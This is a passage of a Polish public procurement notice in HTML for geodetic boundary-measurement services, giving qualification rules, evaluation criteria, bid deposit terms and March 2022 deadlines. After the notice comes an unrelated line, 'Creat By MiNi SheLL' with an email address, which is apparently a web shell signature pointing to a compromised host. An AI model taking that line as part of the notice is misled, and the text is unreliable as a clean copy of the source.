247101_1.0004.AR_1ROZB.3245/435<br/>27	247101_1.0004.AR_1ROZB.3292<br/>28	247101_1.0004.AR_2-10DĄBR.189<br/>29	247101_1.0005.AR_10.351/116<br/>30	247101_1.0005.AR_10.353/116<br/>31	247101_1.0005.AR_2-1.1243/1<br/>32	247101_1.0005.AR_2-1.2285<br/>33	247101_1.0005.AR_2-1.2287<br/>34	247101_1.0005.AR_2-3.2277<br/>35	247101_1.0005.AR_2-5.1143/71<br/>36	247101_1.0005.AR_2-7.1714/192<br/>37	247101_1.0005.AR_2-7.1858/140<br/>38	247101_1.0005.AR_2-8.1814/166<br/>39	247101_1.0005.AR_2-8.1888/192<br/>40	247101_1.0005.AR_3-2.1634/243<br/>41	247101_1.0005.AR_3-8.2732/123<br/>42	247101_1.0005.AR_5.335/11<br/>43	247101_1.0005.AR_6-1.17<br/>44	247101_1.0005.AR_6-1.22<br/>45	247101_1.0005.AR_6-2.1448<br/>46	247101_1.0005.AR_6-2.1449<br/>47	247101_1.0005.AR_6-2.1450<br/>48	247101_1.0005.AR_6-5.1151/138<br/>49	247101_1.0005.AR_6-6.1160/150<br/>50	247101_1.0005.AR_6-6.1179/133<br/>51	247101_1.0005.AR_7-2.655/75<br/>52	247101_1.0005.AR_7-3.613/51<br/>53	247101_1.0005.AR_7-3.625/50<br/>54	247101_1.0005.AR_7-4.704/35<br/>55	247101_1.0005.AR_8.450/175<br/>56	247101_1.0005.AR_9.415/48<br/>57	247101_1.0005.AR_9.514/47<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ.<br/>VI. Wymagania w zakresie elektromobilności:<br/><br/>1. Zgodnie z art. 35 ust 2 pkt 1) i 68 ust. 3 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (Dz. U. z 2020 r. poz. 908 z późn. zm.) Zamawiający zleci wykonywanie zadania objętego niniejszym postępowaniem podmiotowy (Wykonawcy), którego udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów użytkowanych przy wykonywaniu tego zadania (zamówienia publicznego) wynosić będzie od dnia 1 stycznia 2022 r. co najmniej 10%, a od dnia 1 stycznia 2025 r. co najmniej 30 %, z uwzględnieniem ewentualnych zmian powyższej ustawy, polegających na zmianie wielkości udziału pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym lub przesunięciu wskazanej w niej daty początkowej.<br/>2. Przy obliczaniu procentowego limitu pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym, o których mowa w pkt V.1) SWZ należy uwzględnić zaokrąglenie do pełnych jednostek (sztuk). <br/>3. Przez pojazdy elektryczne, o których mowa w pkt V.1) SWZ rozumie się pojazdy samochodowe w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tj. pojazdy silnikowe, których konstrukcja umożliwia jazdę z prędkością przekraczającą 25 km/h z wyłączeniem ciągników rolniczych), wykorzystujące do napędu wyłącznie energię elektryczną akumulowaną przez podłączenie do zewnętrznego źródła zasilania.<br/>4. Przez pojazdy napędzane gazem ziemnym, o których mowa w pkt V.1) SWZ rozumie się pojazdy samochodowe w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (tj. pojazdy silnikowe, których konstrukcja umożliwia jazdę z prędkością przekraczającą 25 km/h z wyłączeniem ciągników rolniczych), wykorzystujące do napędu sprężony gaz ziemny (CNG) lub skroplony gaz ziemny (LNG), w tym pochodzący z biometanu.<br/><br/>VII. Rozwiązania równoważne<br/><br/>W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowanie rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia.<br/>Jeżeli Wykonawca nie złożył ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia), Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia. <br/><br/> VIII. Wymagania w zakresie dostępności dla wszystkich użytkowników i osób niepełnosprawnych<br/><br/>Na podstawie art. 100 u.p.z.p., Zamawiający adekwatnie do przedmiotu zamówienia zapewnia dostępność dla wszystkich użytkowników, w tym dla osób niepełnosprawnych i z uwzględnieniem tych wymagań sporządza opis niniejszego przedmiotu zamówienia. Przedmiot zamówienia nie obejmuje zakresu usług ingerujących w dostępność dla wszystkich użytkowników, w tym osób niepełnosprawnych, a także nie stawia takich wymogów szczególnych, ponad normy ogólne. Realizacja przedmiotu zamówienia nie stawia barier lub jakichkolwiek utrudnień w tym obszarze przestrzeni publicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71355000-1 - Usługi pomiarowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I Kryterium - cena (C) waga 60% <br/>II Kryterium - gwarancja na przedmiot umowy (G) waga 40%<br/> <br/>3. Ocena ofert w oparciu o powyższe kryteria dokonana zostanie w następujący sposób:<br/><br/>Kryterium I - cena (C) - waga 60%<br/><br/>C = (cena najniższa spośród wszystkich ofert/cena badanej oferty) x 100 punktów x 60%<br/><br/>Kryterium II – gwarancja na przedmiot umowy (G) – waga 40 %<br/><br/>Zamawiający przyzna wykonawcy punkty za zadeklarowany w formularzu oferty okres gwarancji (maksymalnie 40 punktów); w przypadku braku wpisania w formularzu oferty gwarancji na przedmiot umowy, Zamawiający przyzna w tym kryterium „0” punktów i Wykonawca będzie zobowiązany do gwarancji minimalnej tj. 12 miesięcy.<br/><br/>- 12 miesięcy – 0 pkt.<br/>– 24 miesiące – 20 pkt <br/>– 36 miesięcy – 40pkt <br/><br/>G = (ilość punktów badanej oferty za gwarancję / największa ilość punktów za gwarancję tj. 40) x 100 punktów x 40%<br/><br/><br/>Łączna ocena punktowa będzie stanowić sumę uzyskanych przez wykonawcę punktów we wszystkich kryteriach = (C) + (G)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.4. Zdolność techniczna lub zawodowa:<br/> Część 1<br/><br/>3.4.1. Zamawiający uzna ww warunek za spełniony, jeśli Wykonawca wykaże, że <br/><br/>- w ciągu roku kalendarzowego co najmniej jedną usługę polegającą na wznowieniu/ustaleniu/wyznaczeniu punktów załamania granic przynajmniej 35 działek ewidencyjnych lub 350 punktów załamania granic<br/><br/> <br/>3.4.2 dysponuje lub będzie dysponował:<br/><br/>- co najmniej jedną osobą posiadającą wykształcenie geodezyjne z uprawnieniami, o których mowa w art. 43 ust. 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne, która będzie kierowała pracami geodezyjnymi.<br/><br/>- co najmniej jedną osobą, która ukończyła kurs administratorów Geo- Info, potwierdzone certyfikatem ukończenia.<br/><br/>Część 2<br/><br/>3.4.1. Zamawiający uzna ww warunek za spełniony, jeśli Wykonawca wykaże, że <br/><br/>- w ciągu roku kalendarzowego co najmniej jedną usługę polegającą na wznowieniu/ustaleniu/wyznaczeniu punktów załamania granic przynajmniej 35 działek ewidencyjnych lub 350 punktów załamania granic<br/><br/> <br/>3.4.2 dysponuje lub będzie dysponował:<br/><br/>- co najmniej jedną osobą posiadającą wykształcenie geodezyjne z uprawnieniami, o których mowa w art. 43 ust. 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne, która będzie kierowała pracami geodezyjnymi.<br/><br/>- co najmniej jedną osobą, która ukończyła kurs administratorów Geo- Info, potwierdzone certyfikatem ukończenia.<br/><br/>Obydwie części:<br/><br/>3.4.1. Zamawiający uzna ww warunek za spełniony, jeśli Wykonawca wykaże, że <br/><br/>- w ciągu roku kalendarzowego co najmniej jedną usługę polegającą na wznowieniu/ustaleniu/wyznaczeniu punktów załamania granic przynajmniej 35 działek ewidencyjnych lub 350 punktów załamania granic<br/><br/> <br/>3.4.2 dysponuje lub będzie dysponował:<br/><br/>- co najmniej jedną osobą posiadającą wykształcenie geodezyjne z uprawnieniami, o których mowa w art. 43 ust. 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne, która będzie kierowała pracami geodezyjnymi.<br/><br/>- co najmniej jedną osobą, która ukończyła kurs administratorów Geo- Info, potwierdzone certyfikatem ukończenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- w celu wykazania spełniania warunku z ust. 3.4.1<br/>WARUNKI DOTYCZĄ CZĘŚCI 1, CZĘŚCI 2 I OBYDWU CZĘŚCI<br/>wykaz usług:<br/>- w ciągu roku kalendarzowego co najmniej jedną usługę polegającą na wznowieniu/ustaleniu/wyznaczeniu punktów załamania granic przynajmniej 35 działek ewidencyjnych lub 350 punktów załamania granic wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/><br/>- w celu wykazania spełniania warunku z ust. 3.4.2.<br/><br/>wykaz osób:<br/>- co najmniej jedną osobą posiadającą wykształcenie geodezyjne z uprawnieniami, o których mowa w art. 43 ust. 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne, która będzie kierowała pracami geodezyjnymi.<br/><br/>- co najmniej jedną osobą, która ukończyła kurs administratorów Geo- Info, potwierdzone certyfikatem ukończenia <br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami.<br/><br/>Uwaga:<br/>Aby zapewnić ciągłość pracy ODGK, system Geo-Info 7, w którym prowadzona jest baza danych, oferuje funkcjonalność cyklicznego aktualizowania bazy Wykonawcy o dane o przyjęte do zasobu, tzw. „plik różnicowy z ODGK”. Dzięki temu baza danych Zamawiającego i Wykonawcy jest ze sobą spójna. Jednocześnie możliwość taka występuje jedynie w przypadku wydania dla Wykonawcy danych w formacie .giv, unikalnym dla systemu Geo-Info 7</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Po wyborze najkorzystniejszej oferty, w celu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca zobowiązany będzie do:<br/><br/>1) złożenia dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o ile upoważnienie do reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych Wykonawcy, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie postępowania o udzielenie zamówienia,<br/>2) w przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, złożenia umowy regulującej współpracę tych podmiotów (np. umowa konsorcjum, umowa spółki cywilnej), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: <br/><br/>1 300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100)- dla części 1<br/>1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100) – dla części 2<br/><br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/><br/>3.	Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/><br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. z 2020 r. poz. 299).<br/><br/>W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego prowadzony przez PKO Bank Polski SA: nr 05 1020 2313 0000 3402 0556 3525. <br/><br/>Uwaga: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne<br/> wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.<br/>Szczegółowe informacje dotyczące wadium znajdują się w rozdziale 18 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/><br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. 12 SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/><br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału 12 SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/><br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/><br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/><br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 16. ZMIANY UMOWY<br/><br/>1.	Zamawiający na mocy art. 455 ust. 1 pkt. 1 u.p.z.p. dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści protokołu negocjacji bez przeprowadzania nowego postępowania o udzielenie zamówienia. Zamawiający dopuszcza także zmianę umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w przypadkach opisanych w treści art. 455 ust. 1 pkt. 2, 3 i 4 oraz ust. 2, 3 i 4 u.p.z.p.<br/>2.	Okoliczności, wskazane w art. 455 ust. 1 pkt. 1) u.p.z.p., tzn. takie, które zostały przewidziane w SWZ, Umowie lub dokumentach zamówienia, niezależnie od wartości zmiany, w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które określają postanowienia dotyczące zasad wprowadzania zmian, ich zakres, w szczególności możliwość zmiany wysokości wynagrodzenia Wykonawcy i charakter oraz warunki wprowadzenia zmian. Zamawiający przewiduje zatem wprowadzenie następujących zmian, określając ich zakres i tryb, oraz wskazując okoliczności, wobec wystąpienia których wymagane będzie sporządzenie stosownego aneksu do Umowy (poniższe warunki określają rodzaj i zakres zmian, warunki wprowadzania zmian i jednocześnie nie przewidują takich zmian, które modyfikowałyby ogólny charakter umo-wy):<br/>1)	zmiany osób, które będą uczestniczyć w wykonaniu zamówienia w przypadkach i na zasadach określonych w § 3 niniejszej Umowy, tj. w szczególności w przypadku:<br/>a)	śmierci osób wymienionych w § 3 ust. 1 lub 2 niniejszej Umowy,<br/>b)	długotrwałej choroby osób wymienionych w § 3 ust. 1 lub 2 niniejszej Umowy,<br/>c)	utraty, wygaśnięcia lub zawieszenia ważności niezbędnych uprawnień wymaganych przepisami prawa, <br/>d)	niewypełniania lub nienależytego wypełniania obowiązków, <br/>e)	wystąpienia innych okoliczności będących wynikiem np. zdarzeń losowych, przeszkód formalnych, prawnych, skutkujących koniecznością zmiany osób wymienionych w § 3 ust. 1 lub 2 niniejszej Umowy , w związku z brakiem możliwości wykonywania przez nich obowiązków zgodnie z niniejszą Umową lub przepisami prawa,<br/>2)	w związku z wystąpieniem okoliczności niezależnych od Wykonawcy, tj. prawnych, formalnych lub zdarzeń losowych – zmiana podwykonawcy lub wprowadzenie podwykonawcy w zakresie nie przewidzianym w treści oferty złożonej przez Wykonawcę. W przypadku, gdy Wykonawca polegał na zasobach podwykonawcy w celu wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia, zmiana podwykonawcy jest dopuszczalna z zastrzeżeniem § 6 niniejszej Umowy.<br/>3.	Zmiany danych związanych z obsługą administracyjno-organizacyjną Umowy (np. danych teleadresowych itp.) następują poprzez pisemne zgłoszenie tego faktu drugiej Stronie i nie wymagają zawarcia aneksu do Umowy.<br/>4.	Wszelkie zmiany niniejszej Umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności – aneksu do Umowy, z zastrzeżeniem przypadków, w których wskazano, że nie jest wymagane zawarcie aneksu do Umowy.<br/>5.	Zmiana Umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna.<br/>6.	Wykonawca, w przypadku wystąpienia którejkolwiek z okoliczności wskazanych w ust. 2 pkt 1), niezwłocznie zaproponuje inne osoby posiadające stosowne uprawnienia. W przypadku zaistnienia podstaw do zmiany , osoby, która je zastąpią, muszą spełniać co najmniej takie same wymagania stawiane dla o kierownika prac i osoby odpowiedzialnej za wykonywanie importów/eksportów, jak w postępowaniu o udzielenie zamówienia publicznego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-22 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com